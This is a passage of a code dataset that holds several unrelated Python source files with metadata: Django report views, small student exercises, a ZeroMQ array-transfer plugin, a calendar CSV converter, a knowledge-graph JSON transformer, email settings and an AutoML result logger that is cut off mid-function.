report_info['rptid']\n\n # Return response\n t = get_template('manage.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\ndef page_report(request, rptid, type, pageid=None, section=None):\n \"\"\"\n Call the report function, but allow a different ordering of arguments.\n \"\"\"\n return report(request, rptid, type, section, pageid)\n\n#----------------------------------------------------------------\ndef report(request, rptid, type=None, section=None, pageid=None):\n \"\"\"\n Serve the requested report, with defaults for type, section and pageid\n when none are specified.\n \"\"\"\n # Set default values\n default_type = 'summary'\n default_section = 'nav'\n default_pageid = '1'\n\n # Get latest report parameters if they exist\n report_info = get_report_info(request, rptid)\n\n # If report_info doesn't exist, return error message\n if not report_info:\n return message(request, HttpResponse(), 'Report ID does not exist!')\n\n if type:\n report_info['type'] = type\n else:\n if not 'type' in report_info:\n report_info['type'] = default_type\n\n if section:\n report_info['section'] = section\n else:\n if not 'section' in report_info:\n report_info['section'] = default_section\n\n if pageid:\n report_info['pageid'] = pageid\n else:\n if not 'pageid' in report_info:\n report_info['pageid'] = default_pageid\n\n # Store report parameters in session variable\n request.session['report'] = report_info\n\n # If we're exporting data as XML, we do that here...\n if report_info['type'] == 'xml':\n export_filename = 'fae-' + rptid + '.xml'\n content = get_report_content(report_info, '')\n response = HttpResponse(content, mimetype='text/xml')\n response['Content-Disposition'] = 'attachment; filename=%s' % export_filename\n return response\n\n # Construct the document title\n title = labels['report'][report_info['type']]\n if report_info['type'] == 'page' and report_info['pgcount'] != '1':\n title += ': ' + report_info['pageid']\n\n # Save report_header at this point for get_report_content\n report_header = title\n if report_info['type'] == 'sitewide' or report_info['type'] == 'page':\n title += ': ' + labels['section'][report_info['section']]\n\n # Select the report template\n if report_info['type'] == 'sitewide':\n template_name = 'site_report.html'\n else:\n template_name = 'report.html'\n\n # Set up context\n context = {\n 'page_type': 'report',\n 'title': title,\n 'content': get_report_content(report_info, report_header)\n }\n if report_info['type'] == 'sitewide' or report_info['type'] == 'page':\n context['display_sections'] = True\n\n # If results data was not found, return error message\n if not context['content']:\n return message(request, HttpResponse(), 'Report data does not exist!')\n\n # Return response\n t = get_template(template_name)\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\ndef pgrpteval(request):\n if request.is_ajax():\n report_info = request.session.get('report', {})\n testid = request.GET.get('testid', '')\n eval = request.GET.get('eval', '')\n content = get_pgrpteval_content(report_info, testid, eval)\n else:\n content = 'None'\n return HttpResponse(content) \n\n#----------------------------------------------------------------\ndef about(request, content_id='overview'):\n title = labels['about'] + ': ' + labels['subtitle'][content_id]\n content = 'about/' + content_id + '.html'\n\n context = {\n 'page_type': 'about',\n 'title': title,\n 'subtitle': labels['subtitle'],\n 'content': content,\n }\n\n if content_id == 'usage':\n today = date.today()\n one_week_ago = today - timedelta(days=8) # account for lag in collecting stats\n span = request.GET.get('span', '')\n\n if span == 'thismonth':\n stats = UsageStats.objects.filter(date__month=today.month, date__year=today.year)\n elif span == 'lastmonth':\n if today.month == 1:\n month, year = 12, today.year - 1\n else:\n month, year = today.month - 1, today.year\n stats = UsageStats.objects.filter(date__month=month, date__year=year)\n elif span == 'thisyear':\n stats = UsageStats.objects.filter(date__year=today.year)\n elif span == 'all':\n stats = UsageStats.objects.all()\n else: # Default to last seven days\n span = 'default'\n stats = UsageStats.objects.filter(date__gte=one_week_ago, date__lte=today)\n context['stats'] = stats\n context['caption'] = labels['stats'][span]\n\n # Aggregate totals for reports and pgcount fields\n user_reports = 0; user_pgcount = 0; guest_reports = 0; guest_pgcount = 0\n for record in stats:\n user_reports += record.user_reports\n user_pgcount += record.user_pgcount\n guest_reports += record.guest_reports\n guest_pgcount += record.guest_pgcount\n context['user_reports'] = user_reports\n context['user_pgcount'] = user_pgcount\n context['guest_reports'] = guest_reports\n context['guest_pgcount'] = guest_pgcount\n\n # Return response\n t = get_template('about/about.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\ndef get_report_info(request, rptid):\n \"\"\"\n Given a report ID:\n IF rptid matches existing report_info\n return existing report_info\n ELSE\n lookup report by rptid in database\n IF found\n return a new dictionary with rptid\n and pgcount keys/values\n ELSE\n return an empty dictionary to flag\n that report does not exist\n \"\"\"\n # Get latest report parameters if they exist\n report_info = request.session.get('report', {})\n\n if request.user.is_authenticated():\n primary = UserReport\n secondary = GuestReport\n else:\n primary = GuestReport\n secondary = UserReport\n\n if 'rptid' in report_info and report_info['rptid'] == rptid:\n return report_info\n else:\n try:\n report = primary.objects.get(id=rptid)\n except ObjectDoesNotExist:\n try:\n report = secondary.objects.get(id=rptid)\n except ObjectDoesNotExist:\n return {}\n\n return { 'rptid': rptid,\n 'pgcount': str(report.pgcount),\n 'filename': report.get_filename()\n }\n\n#----------------------------------------------------------------\ndef logout(request):\n from django.contrib.auth.views import logout\n return logout(request, next_page='/')\n\n#----------------------------------------------------------------\ndef get_profile_data(profile_obj):\n \"\"\"\n Given a user profile object, returns a dictionary representing\n its fields, suitable for passing as the initial data of a form.\n This fn. courtesy of James Bennett's broken profiles package.\n \"\"\"\n opts = profile_obj._meta\n data_dict = {}\n for f in opts.fields + opts.many_to_many:\n data_dict[f.name] = f.value_from_object(profile_obj)\n return data_dict\n\n#----------------------------------------------------------------\n@login_required\ndef my_account(request):\n user_data = {\n 'first_name': request.user.first_name,\n 'last_name': request.user.last_name,\n 'email': request.user.email\n }\n\n try:\n profile_obj = request.user.get_profile()\n except ObjectDoesNotExist:\n profile_obj = UserProfile(user=request.user, acct_type=1)\n\n if request.method == 'POST':\n user_form = UserForm(request.POST, instance=request.user)\n profile_form = ProfileForm(request.POST, instance=profile_obj)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return HttpResponseRedirect('/')\n else:\n user_form = UserForm(initial=user_data)\n profile_form = ProfileForm(initial=get_profile_data(profile_obj))\n\n context = {\n 'title': labels['profile'],\n 'username': request.user.username,\n 'user_form': user_form,\n 'profile_form': profile_form,\n }\n\n # Return response\n t = get_template('my_account.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n","sub_path":"fae/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351972666","text":"def getAttributes():\n return [\"panjang\", \"lebar\", \"tinggi\"]\n\ndef getVolume(p, l, t):\n volume = p * l * t\n return volume\n\ndef getLuasPermukaan(p, l, t):\n Lp1 = 2 * p * l\n Lp2 = 2 * l * t\n Lp3 = 2 * t * p\n luasPermukaan = Lp1 + Lp2 + Lp3\n return luasPermukaan\n\ndef getHasil(p, l, t):\n hasil = \"Volume Balok = \" + str(getVolume(p, l, t)) + \"\\n\" + \"Luas Permukaan Balok = \" + str(getLuasPermukaan(p, l, t))\n return hasil\n\ndef checkError(inputUsers, nama, value) :\n if nama == \"panjang\" :\n if value <= 0 :\n return nama + \" tidak boleh kurang dari atau sama dengan 0\"\n else :\n return True\n elif nama == \"lebar\" :\n if value <= 0 :\n return nama + \" tidak boleh kurang dari atau sama dengan 0\"\n else : \n return True\n\n elif nama == \"tinggi\" :\n if value <= 0 :\n return nama + \" tidak boleh kurang dari atau sama dengan 0\"\n else : \n return True","sub_path":"Dimensi3/balok.py","file_name":"balok.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165342676","text":"class TV:\r\n def __init__(self, channel=1, volume=0):\r\n self.channel = channel\r\n self.volume = volume\r\n print(\"Telewizor włączony\")\r\n\r\n\r\n def __str__(self):\r\n return f\"Aktualny kanał: {self.channel} Stan głośności: {self.volume}\"\r\n\r\n def change_channel(self):\r\n value = int(input(\"Wybierz kanał: \"))\r\n self.channel = value\r\n def change_valoume(self):\r\n value = int(input(\"Wybierz poziom głośności: \"))\r\n self.volume = value\r\n\r\n @property\r\n def channel(self):\r\n return self._channel\r\n @channel.setter\r\n def channel(self, value):\r\n while True:\r\n try:\r\n int(value)\r\n except ValueError:\r\n value = int(input(\"Kanał określany jest literami \"))\r\n else:\r\n if 0 < value > 36:\r\n value = int(input(\"Kanał nie musi być z zakresu [1:35] \"))\r\n else:\r\n self._channel = value\r\n break\r\n @property\r\n def volume(self):\r\n return self._volume\r\n @volume.setter\r\n def volume(self, value):\r\n while True:\r\n try:\r\n int(value)\r\n except ValueError:\r\n value = int(input(\"Głośność nie jest określana literami \"))\r\n else:\r\n if 0 <= value > 11:\r\n value = int(input(\"Głośność musi być z zakresu [0:10] \"))\r\n else:\r\n self._volume = value\r\n break\r\n\r\n\r\n\r\n","sub_path":"lab1/ex5/tv.py","file_name":"tv.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378775966","text":"#!/usr/bin/env dls-python\nfrom adPythonPlugin import AdPythonPlugin\nimport numpy\nimport sys\nimport logging\nimport time\n\nfrom pkg_resources import require\nrequire('pyzmq')\nrequire('msgpack-python')\nimport zmq\n\nimport blosc\nimport msgpack\n\nclass Transfer(AdPythonPlugin):\n\n def __init__(self):\n self.log.setLevel(logging.DEBUG)\n params = dict(tcpport = 34567, num_clients=0, level=6, ratio=0.0)\n AdPythonPlugin.__init__(self, params)\n \n self.zmq_context = zmq.Context()\n self.zmq_socket = self.zmq_context.socket(zmq.PUB)\n self.zmq_socket.bind(\"tcp://*:%d\"%self['tcpport'])\n self.log.debug(\"HWM: %d\", self.zmq_socket.get_hwm())\n self.zmq_socket.set_hwm(2)\n \n def paramChanged(self):\n pass\n \n def processArray(self, arr, attr):\n self.log.debug('packing array with shape: %s', str(arr.shape))\n \n # Pack a description of the array dimensions and datatype into a packet\n msg_array_desc = msgpack.packb({'dtype': str(arr.dtype), 'shape': arr.shape})\n\n # Compress the data from the array without making a copy (i.e. by passing a read-only\n # pointer to the blosc library.\n arr_ptr = arr.__array_interface__['data'][0]\n msg_array = blosc.compress_ptr(arr_ptr, arr.size, arr.dtype.itemsize, self['level'], True)\n # Calculate the resulting compression ratio\n self['ratio'] = float(len(msg_array)) / float(arr.nbytes)\n self.log.debug(\"Compressed ratio: %d/%d %.3f\", arr.nbytes, len(msg_array), self['ratio'])\n\n # Pack the NDAttribute dictionary into a packet\n self.log.debug('packing attributes')\n msg_attr = msgpack.packb(attr)\n self.log.debug(' result dict length: %d', len(msg_attr))\n \n # Send the packets in a multipart zmq message.\n self.log.debug('sending multipart message')\n tracker = self.zmq_socket.send_multipart([msg_array_desc, msg_array, msg_attr], copy=False, track=True)\n \n # Wait for ZMQ to report that it has completed. We can possibly ignore this step - but then we would be\n # relying on the ZMQ buffering rather than our areaDetector buffers - and that is much less configurable.\n #self.log.debug('waiting for send to complete')\n #try:\n # tracker.wait(1.0)\n #except zmq.NotDone:\n # self.log.exception('Timeout when waiting to complete transfer: %s', str(zmq.NotDone))\n \n # All done, ready for new frame!\n self.log.debug('Processing done!')\n return None\n \nif __name__==\"__main__\":\n Focus().runOffline()\n","sub_path":"adPythonApp/scripts/adPythonTransfer.py","file_name":"adPythonTransfer.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83464496","text":"__author__ = 'blueteeth'\n\nimport csv\nimport sys\nfrom datetime import datetime, timedelta\n\n'''\n\tGoogle Calendar format:\n\t\tSubject,Start Date,Start Time,End Date,End Time,All Day Event,Description,Location,Private\n\t\n\tSoton Calendar format:\n\t\tDay,StartTime,EndTime,Module,Lecturer,Location,Weeks\n\t\t\n\tUSAGE: python calendar-converter.py [input.csv] [output.csv]\n'''\n\nclass CalendarConverter:\n\t\n\tday_offset = {\n\t\t\"Monday\" \t: 0,\n\t\t\"Tuesday\"\t: 1,\n\t\t\"Wednesday\" : 2,\n\t\t\"Thursday\"\t: 3,\n\t\t\"Friday\"\t: 4,\n\t\t\"Saturday\"\t: 5,\n\t\t\"Sunday\"\t: 6\n\t}\n\t\n\tdef __init__(self, infile, outfile, first_term_day):\n\t\tinfile = open(infile)\n\t\toutfile = open(outfile, 'wb')\n\t\tself.reader = csv.reader(infile)\n\t\tself.writer = csv.writer(outfile, lineterminator='\\n')\n\t\tself.first_term_day = first_term_day\n\t\t\n\t\tself.has_header = False # if the output file yet has the header information\n\t\n\tdef __exit__(self):\n\t\t# when done close files\n\t\tinfile.close()\n\t\toutfile.close()\n\t\t\n\tdef add_entry(self, line_data, week_number):\n\t\t\n\t\t# day of the week\n\t\tday = line_data[0]\n\t\t\n\t\t# start time\n\t\tstart_time = line_data[1]\n\t\t\n\t\t# end time\n\t\tend_time = line_data[2]\n\t\t\n\t\t# module\n\t\tmodule = line_data[3]\n\t\t\n\t\t# lecturers\n\t\tlecturer = line_data[4]\n\t\t\n\t\t# location\n\t\tlocation = line_data[5]\n\t\t\n\t\t# ------------------------ #\n\t\t# Google Calendar Headings #\n\t\t# ------------------------ #\n\t\t\n\t\t# subject 'COMP1202 - 58/1067'\n\t\tsubject = '%s - %s' % (module, location)\n\t\t\n\t\t# date is the first day of term + day of the week + number of weeks since term start\n\t\tstart_date = self.first_term_day + timedelta(days=CalendarConverter.day_offset[day], weeks=week_number-1) \n\t\t# end date is the same as start date\n\t\t\n\t\tstart_date_string = start_date.strftime(\"%Y/%m/%d\")\n\t\t\n\t\t# description \n\t\t# lecturer field contains commas, so must be surrounded by '\"'\n\t\tdescription = '\"%s - %s - %s\"' % (lecturer, location, line_data[6])\n\t\t\n\t\t\n\t\tgcalendar_headers = [\n\t\t\t\"Subject\",\n\t\t\t\"Start Date\",\n\t\t\t\"Start Time\",\n\t\t\t\"End Date\",\n\t\t\t\"End Time\",\n\t\t\t\"All Day Event\",\n\t\t\t\"Description\",\n\t\t\t\"Location\",\n\t\t\t\"Private\"\n\t\t]\n\t\t\n\t\t# ----------- #\n\t\t# CSV WRITING #\n\t\t# ----------- #\n\t\t\n\t\tif not self.has_header:\n\t\t\tself.writer.writerow(gcalendar_headers)\n\t\t\tself.has_header = True\n\t\t\n\t\tgcalendar_line = [\n\t\t\tsubject,\n\t\t\tstart_date_string,\n\t\t\tstart_time,\n\t\t\tstart_date_string,\n\t\t\tend_time,\n\t\t\tFalse,\n\t\t\tdescription,\n\t\t\tlocation,\n\t\t\tFalse\n\t\t]\n\t\t\n\t\tself.writer.writerow(gcalendar_line)\n\t\t\n\t\n\tdef convert(self):\n\t\tfor row in self.reader:\n\t\t\tif row and row != ['', '', '', '', '', '', '']: # row exists and is populated\n\t\t\t\tweeks = row[-1].split(',') # weeks are in the last column\n\t\t\t\t\n\t\t\t\tfor week in weeks:\n\t\t\t\t\tif '-' in week: # a range of weeks\n\t\t\t\t\t\tindividual_weeks = week.split('-')\n\t\t\t\t\t\tstart_week = int(individual_weeks[0])\n\t\t\t\t\t\tend_week = int(individual_weeks[1])\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor w in range(start_week, end_week + 1):\n\t\t\t\t\t\t\tself.add_entry(row, w)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tindividual_week = int(week)\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tprint(row)\n\t\t\t\t\t\t\traise Exception(\"Something wrong with the week column on this line.\")\n\t\t\t\t\t\tself.add_entry(row, individual_week)\n\t\t\t\t\ndef main():\n\tprint('Soton Timetable - Google Calendar Converter')\n\tprint\n\tprint('Converts the CSV file from the download option on the SUSSED')\n\tprint('Calendar, to a format that can be imported in Google Calendar.')\n\tprint\n\t\n\tdef get_first_term_day():\n\t\t\n\t\tdef get_monday_before(day):\n\t\t\tweekday_val = day.weekday()\n\t\t\treturn day - timedelta(days=weekday_val)\n\t\t\n\t\tfirst_day = \"25/09/2014\"\n\t\tprint(\"Enter the date of the first day of term.\")\n\t\tprint(\"The format should be DD/MM/YYYY.\")\n\t\tprint(\"The default is %s.\" % first_day)\n\t\t\n\t\tday = raw_input(\"> \")\n\t\tif day: # some date has been entered.\n\t\t\tfirst_day = day \n\t\ttry:\n\t\t\tfirst_term_day = datetime.strptime(first_day, \"%d/%m/%Y\")\n\t\t\tif first_term_day.weekday() != 0: # the entered day is not a monday\n\t\t\t\tfirst_term_day = get_monday_before(first_term_day)\n\t\t\t\tprint(\"Setting first day as %s\" % first_term_day.strftime(\"%Y/%m/%d\"))\n\t\texcept ValueError:\n\t\t\traise Exception(\"Invalid first day.\")\n\t\t\treturn get_first_term_day()\n\t\treturn first_term_day\n\t\n\tdef get_input_filename():\n\t\tfilename = ''\n\t\tif len(sys.argv) > 1:\n\t\t\tfilename = sys.argv[1]\n\t\telse:\n\t\t\tprint(\"Enter the location of the input filename.\")\n\t\t\tfilename = raw_input(\"> \")\n\t\treturn filename\n\t\n\tdef get_output_filename():\n\t\tfilename = 'output.csv'\n\t\tif len(sys.argv) > 2:\n\t\t\tfilename = sys.argv[2]\n\t\telse:\n\t\t\tprint(\"Enter output filename.\")\n\t\t\tfilename = raw_input(\"> \")\n\t\treturn filename\n\t\n\tinfile = get_input_filename()\n\tprint\n\toutfile = get_output_filename()\n\tprint\n\tfirst_day = get_first_term_day()\n\tprint\n\t\n\tc = CalendarConverter(infile, outfile, first_day)\n\tc.convert()\n\nmain()\n\t\n\t\n\t","sub_path":"calendar-converter-legacy.py","file_name":"calendar-converter-legacy.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"595957227","text":"import os\r\nimport subprocess\r\nimport re\r\n\r\ndef get_username_from_github():\r\n if \"TRAVIS_PULL_REQUEST_SLUG\" in os.environ:\r\n if os.environ[\"TRAVIS_PULL_REQUEST_SLUG\"] != \"\":\r\n repo_string = os.environ[\"TRAVIS_PULL_REQUEST_SLUG\"]\r\n else:\r\n repo_string = os.environ[\"TRAVIS_REPO_SLUG\"]\r\n\r\n username, _ = repo_string.split(\"/\")\r\n else:\r\n remotes_string = subprocess.check_output(\r\n [\"git\", \"remote\", \"-v\"]\r\n ).decode(\"utf8\")\r\n matches = re.search('origin.*?github.com.(.*?)/softcite-dataset', remotes_string)\r\n username = matches.group(1)\r\n\r\n if (username == \"howisonlab\"):\r\n username = \"jameshowison\"\r\n\r\n return username.lower()\r\n","sub_path":"code/getUsername.py","file_name":"getUsername.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"151594829","text":"import json, logging\nfrom kgx.transformers.pandas_transformer import PandasTransformer\nfrom typing import List, Dict\n\nclass JsonTransformer(PandasTransformer):\n \"\"\"\n Transformer that parses a JSON, and loads nodes and edges into a networkx.MultiDiGraph\n \"\"\"\n\n def parse(self, filename: str, input_format: str = 'json', provided_by: str = None, **kwargs) -> None:\n \"\"\"\n Parse a JSON file of the format,\n\n {\n \"nodes\" : [...],\n \"edges\" : [...],\n }\n\n Parameters\n ----------\n filename: str\n JSON file to read from\n input_format: str\n The input file format (``json``, by default)\n provided_by: str\n Define the source providing the input file\n kwargs: dict\n Any additional arguments\n\n \"\"\"\n logging.info(\"Parsing {}\".format(filename))\n if provided_by:\n self.graph_metadata['provided_by'] = [provided_by]\n with open(filename, 'r') as FH:\n obj = json.load(FH)\n self.load(obj)\n\n def load(self, obj: Dict[str, List]) -> None:\n \"\"\"\n Load a JSON object, containing nodes and edges, into a networkx.MultiDiGraph\n\n Parameters\n ----------\n obj: dict\n JSON Object with all nodes and edges\n\n \"\"\"\n if 'nodes' in obj:\n self.load_nodes(obj['nodes'])\n if 'edges' in obj:\n self.load_edges(obj['edges'])\n\n def load_nodes(self, nodes: List[Dict]) -> None:\n \"\"\"\n Load a list of nodes into a networkx.MultiDiGraph\n\n Parameters\n ----------\n nodes: list\n List of nodes\n\n \"\"\"\n logging.info(\"Loading {} nodes into networkx.MultiDiGraph\".format(len(nodes)))\n for node in nodes:\n self.load_node(node)\n\n def load_edges(self, edges: List[Dict]) -> None:\n \"\"\"\n Load a list of edges into a networkx.MultiDiGraph\n\n Parameters\n ----------\n edges: list\n List of edges\n\n \"\"\"\n logging.info(\"Loading {} edges into networkx.MultiDiGraph\".format(len(edges)))\n for edge in edges:\n self.load_edge(edge)\n\n def export(self) -> Dict:\n \"\"\"\n Export networkx.MultiDiGraph as a dictionary.\n\n Returns\n -------\n dict\n A dictionary with a list nodes and a list of edges\n\n \"\"\"\n nodes = []\n edges = []\n for id, data in self.graph.nodes(data=True):\n node = data.copy()\n node['id'] = id\n nodes.append(node)\n for s, o, data in self.graph.edges(data=True):\n edge = data.copy()\n edge['subject'] = s\n edge['object'] = o\n edges.append(edge)\n\n return {\n 'nodes': nodes,\n 'edges': edges\n }\n\n def save(self, filename: str, **kwargs) -> None:\n \"\"\"\n Write networkx.MultiDiGraph to a file as JSON.\n\n Parameters\n ----------\n filename: str\n Filename to write to\n kwargs: dict\n Any additional arguments\n\n \"\"\"\n obj = self.export()\n with open(filename, 'w') as WH:\n WH.write(json.dumps(obj, indent=4, sort_keys=True))\n","sub_path":"kgx/transformers/json_transformer.py","file_name":"json_transformer.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239171689","text":"import logging\nimport os\n\nfrom zygoat.components import Component, FileComponent, SettingsComponent\nfrom zygoat.components.backend import settings\nfrom zygoat.constants import Projects\n\nfrom . import resources\n\nlog = logging.getLogger()\n\n\"\"\"\n This file contains a few components for setting up basic email capabilities:\n - Takes care of settings for sending email through AWS SES\n - Creates a Mailer class that Zygoat applications can subclass\n - Adds some basic email templates\n\"\"\"\n\nemail_settings = [\n \"\"\"EMAIL_BACKEND = \"django.core.mail.backends.{}.EmailBackend\".format(\n \"console\" if DEBUG else \"smtp\"\n)\"\"\",\n 'EMAIL_HOST = \"email-smtp.us-east-1.amazonaws.com\"',\n \"EMAIL_PORT = 587\",\n 'EMAIL_HOST_USER = prod_required_env(\"DJANGO_EMAIL_HOST_USER\", \"\")',\n 'EMAIL_HOST_PASSWORD = prod_required_env(\"DJANGO_EMAIL_HOST_PASSWORD\", \"\")',\n \"EMAIL_USE_TLS = True\",\n]\n\nsupport_settings = [\n 'SUPPORT_PHONE_NUMBER = \"+1 (855) 943-4177\"',\n 'SUPPORT_EMAIL_ADDRESS = \"support@legalplans.com\"',\n]\n\n\nclass EmailSettings(SettingsComponent):\n def create(self):\n red = self.parse()\n red.extend([\"\\n\"] + email_settings)\n red.extend([\"\\n\"] + support_settings)\n\n log.info(\"Dumping Django email and support settings\")\n self.dump(red)\n\n @property\n def installed(self):\n red = self.parse()\n return red.find(\"name\", value=\"EMAIL_BACKEND\") is not None\n\n\nclass EmailClass(FileComponent):\n resource_pkg = resources\n base_path = os.path.join(Projects.BACKEND, \"shared\")\n filename = \"mailer.py\"\n\n\nclass EmailTemplate(FileComponent):\n resource_pkg = resources\n base_path = os.path.join(Projects.BACKEND, \"backend\", \"templates\", \"email\")\n\n\nclass HtmlTemplate(EmailTemplate):\n filename = \"mlp_transactional_email.html\"\n\n\nclass TextTemplate(EmailTemplate):\n filename = \"mlp_transactional_email.txt\"\n\n\nclass Email(Component):\n pass\n\n\nemail = Email(\n sub_components=[EmailSettings(), EmailClass(), HtmlTemplate(), TextTemplate()],\n peer_dependencies=[settings],\n)\n","sub_path":"willing_zg/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265009046","text":"import time, os, shutil\nfrom hpbandster.core.result import json_result_logger\n\nclass bohb_logger(json_result_logger):\n def __init__(self, constant_hyperparameter, directory, overwrite=False):\n super(bohb_logger, self).__init__(directory, overwrite)\n self.constants = constant_hyperparameter\n\n \n def new_config(self, config_id, config, config_info):\n import json\n if not config_id in self.config_ids:\n self.config_ids.add(config_id)\n\n full_config = dict()\n full_config.update(self.constants)\n full_config.update(config)\n\n with open(self.config_fn, 'a') as fh:\n fh.write(json.dumps([config_id, full_config, config_info]))\n fh.write('\\n')\n\n\nclass tensorboard_logger(object):\n def __init__(self, pipeline_config, constant_hyperparameter, global_results_dir):\n self.start_time = time.time()\n\n b = pipeline_config['max_budget']\n budgets = []\n while b >= pipeline_config['min_budget']:\n budgets.append(int(b))\n b /= pipeline_config['eta']\n\n self.incumbent_results = {b: 0 for b in budgets}\n self.mean_results = {b: [0, 0] for b in budgets}\n\n self.constants = constant_hyperparameter\n self.results_logged = 0\n self.seed = pipeline_config['random_seed']\n self.max_budget = pipeline_config['max_budget']\n self.global_results_dir = global_results_dir\n\n self.keep_only_incumbent_checkpoints = pipeline_config['keep_only_incumbent_checkpoints']\n\n self.incumbent_configs_dir = os.path.join(pipeline_config['result_logger_dir'], 'incumbents')\n self.status_dir = pipeline_config['result_logger_dir']\n self.run_name = '-'.join(pipeline_config['run_id'].split('-')[1:])\n os.makedirs(self.incumbent_configs_dir, exist_ok=True)\n\n\n def new_config(self, config_id, config, config_info):\n pass\n\n def __call__(self, job):\n import json\n import tensorboard_logger as tl \n\n id = job.id\n budget = int(job.kwargs['budget'])\n config = job.kwargs['config']\n # timestamps = job.timestamps\n result = job.result\n # exception = job.exception\n\n if result is None:\n return\n\n self.results_logged += 1\n\n tl.log_value('BOHB/all_results', result['loss'] * -1, self.results_logged)\n\n if budget not in self.incumbent_results or result['loss'] < self.incumbent_results[budget]:\n self.incumbent_results[budget] = result['loss']\n \n full_config = dict()\n full_config.update(self.constants)\n full_config.update(config)\n\n refit_config = dict()\n refit_config['budget'] = budget\n refit_config['seed'] = self.seed\n \n refit_config['incumbent_config_path'] = os.path.join(self.incumbent_configs_dir, 'config_' + str(budget) + '.json')\n with open(refit_config['incumbent_config_path'], 'w+') as f:\n f.write(json.dumps(full_config, indent=4, sort_keys=True))\n \n with open(os.path.join(self.incumbent_configs_dir, 'result_' + str(budget) + '.json'), 'w+') as f:\n f.write(json.dumps([job.id, job.kwargs['budget'], job.timestamps, job.result, job.exception], indent=4, sort_keys=True))\n\n checkpoints, refit_config['dataset_order'] = get_checkpoints(result['info']) or ([],None)\n refit_config['incumbent_checkpoint_paths'] = []\n for i, checkpoint in enumerate(checkpoints):\n dest = os.path.join(self.incumbent_configs_dir, 'checkpoint_' + str(budget) + '_' + str(i) + '.pt' if len(checkpoints) > 1 else 'checkpoint_' + str(budget) + '.pt')\n if os.path.exists(dest):\n os.remove(dest)\n if self.keep_only_incumbent_checkpoints:\n shutil.move(checkpoint, dest)\n else:\n shutil.copy(checkpoint, dest)\n refit_config['incumbent_checkpoint_paths'].append(dest)\n\n refit_path = os.path.join(self.incumbent_configs_dir, 'refit_config_' + str(budget) + '.json')\n with open(refit_path, 'w+') as f:\n f.write(json.dumps(refit_config, indent=4, sort_keys=True))\n\n if budget >= self.max_budget and self.global_results_dir is not None:\n import autoPyTorch.utils.thread_read_write as thread_read_write\n import datetime\n\n dataset_names = sorted([os.path.splitext(os.path.split(info['dataset_path'])[1])[0] for info in result['info']])\n suffix = ''\n if len(result['info']) > 1:\n suffix += '+[' + ', '.join(dataset_names) + ']'\n if budget > self.max_budget:\n suffix += '+Refit'\n\n for info in result['info']:\n thread_read_write.update_results(self.global_results_dir, {\n 'name': os.path.splitext(os.path.split(info['dataset_path'])[1])[0] + suffix, \n 'result': round(info['val_top1'], 2), \n 'seed': self.seed,\n 'refit_config': refit_path, \n 'text': \"{0}/{1} -- {2}\".format(\n round(info['val_datapoints'] * (info['val_top1'] / 100)),\n info['val_datapoints'],\n round(budget / len(result['info'])))\n })\n\n if self.keep_only_incumbent_checkpoints and get_checkpoints(result['info']):\n for checkpoint in get_checkpoints(result['info'])[0]:\n if os.path.exists(checkpoint):\n os.remove(checkpoint)\n\n if budget not in self.mean_results:\n self.mean_results[budget] = [result['loss'], 1]\n else:\n self.mean_results[budget][0] += result['loss']\n self.mean_results[budget][1] += 1\n\n for b, loss in self.incumbent_results.items():\n tl.log_value('BOHB/incumbent_results_' + str(b), loss * -1, self.mean_results[b][1])\n\n for b, (loss, n) in self.mean_results.items():\n tl.log_value('BOHB/mean_results_' + str(b), loss * -1 / n if n > 0 else 0, n)\n\n status = dict()\n for b, loss in self.incumbent_results.items():\n budget_status = dict()\n budget_status['incumbent'] = loss * -1\n mean_res = self.mean_results[b]\n budget_status['mean'] = mean_res[0] / mean_res[1] * -1 if mean_res[1] > 0 else 0\n budget_status['configs'] = mean_res[1]\n status['budget: ' + str(b)] = budget_status\n\n import datetime\n status[\"runtime\"] = str(datetime.timedelta(seconds=time.time() - self.start_time))\n\n with open(os.path.join(self.status_dir, 'bohb_status.json'), 'w+') as f:\n f.write(json.dumps(status, indent=4, sort_keys=True))\n\n\ndef get_checkpoints(info):\n if not isinstance(info, list):\n if 'checkpoint' in info:\n return [info['checkpoint']]\n return []\n\n checkpoints = []\n dataset_order = []\n for subinfo in info:\n if 'checkpoint' in subinfo:\n checkpoints.append(subinfo['checkpoint'])\n dataset_order.append(subinfo['dataset_id'])\n return checkpoints, dataset_order\n\nclass combined_logger(object):\n def __init__(self, *loggers):\n self.loggers = loggers\n\n def new_config(self, config_id, config, config_info):\n for logger in self.loggers:\n logger.new_config(config_id, config, config_info)\n\n def __call__(self, job):\n for logger in self.loggers:\n logger(job)\n \ndef get_incumbents(directory):\n \n incumbents = os.path.join(directory, 'incumbents')\n\n if not os.path.exists(incumbents):\n return None\n\n import re\n file_re = [\n re.compile('config_([0-9]+).json'),\n re.compile('refit_config_([0-9]+).json'),\n re.compile('result_([0-9]+).json'),\n re.compile('checkpoint_([0-9]+).*.pt'),\n 